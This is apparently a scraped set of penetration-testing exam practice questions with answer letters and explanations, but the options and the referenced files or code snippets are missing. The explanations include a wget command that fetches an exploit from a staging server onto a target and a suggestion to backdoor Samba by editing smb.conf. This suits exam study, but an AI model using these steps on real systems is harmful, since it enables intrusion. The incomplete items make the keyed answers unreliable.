Question 6 of 326

A penetration tester discovered a vulnerability that provides the ability to upload to a path via discovery traversal. Some of the files that were discovered through this vulnerability are:

Which of the following is the BEST method to help an attacker gain internal access to the affected machine?

    Correct Answer: C

    Editing the smb.conf file and uploading it to the server is the best method for an attacker to gain internal access to the affected machine because it allows the attacker to modify the server's configuration. The smb.conf file is used to configure Samba services, which handle file and printer sharing across a network. By altering this configuration, the attacker can potentially create a backdoor, modify access permissions, or enable additional services that facilitate remote access and control over the affected machine. This method provides more comprehensive and persistent access compared to simply adding a remote callback line in a script file.

Question 7 of 326

A company obtained permission for a vulnerability scan from its cloud service provider and now wants to test the security of its hosted data.

Which of the following should the tester verify FIRST to assess this risk?

    Correct Answer: A

    The first priority when testing the security of hosted data in a cloud environment is to verify whether sensitive client data is publicly accessible. If sensitive data is publicly accessible, it poses a significant risk, as it can be easily exploited by unauthorized parties. Checking for this should be the primary focus to ensure data confidentiality and integrity in the cloud.

Question 8 of 326

A penetration tester ran the following command on a staging server: python -m SimpleHTTPServer 9891

Which of the following commands could be used to download a file named exploit to a target machine for execution?

    Correct Answer: D

    The command 'python -m SimpleHTTPServer 9891' starts a simple HTTP server on port 9891. To download a file named 'exploit' from this server to a target machine, the command 'wget 10.10.51.50:9891/exploit' can be used. This command leverages the wget utility to connect to the server at IP address 10.10.51.50 on port 9891 and retrieve the file named 'exploit'. Wget is specifically designed for downloading files from web servers, making it the most appropriate choice in this scenario.

Question 9 of 326

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized:

Which of the following commands should the penetration tester run post-engagement?

    Correct Answer: B

    After a penetration test, it is essential to restore the system to its original state and remove any files that were uploaded during the engagement. The code snippet indicates that a file named 'apache' was downloaded to the /tmp directory and executed with elevated permissions. To ensure proper cleanup, the penetration tester should delete this file by using the 'rm -rf /tmp/apache' command. This removes the file and any subdirectories, ensuring no traces of the test file remain. Other options, such as modifying permissions or killing processes, do not fully clean up the system and could leave residual data.

Question 10 of 326

Which of the following is MOST important to include in the final report of a static application-security test that was written with a team of application developers as the intended audience?

    Correct Answer: D

    In a static application-security test, the goal is to identify vulnerabilities in the source code. Given that the intended audience is a team of application developers, it is crucial to provide detailed and actionable information that developers can use to address the identified security issues. Therefore, including the code context for instances of unsafe typecasting operations is most important. This provides developers with the specific lines of code where vulnerabilities are found, making it easier for them to understand and fix these issues, thereby improving the application's security.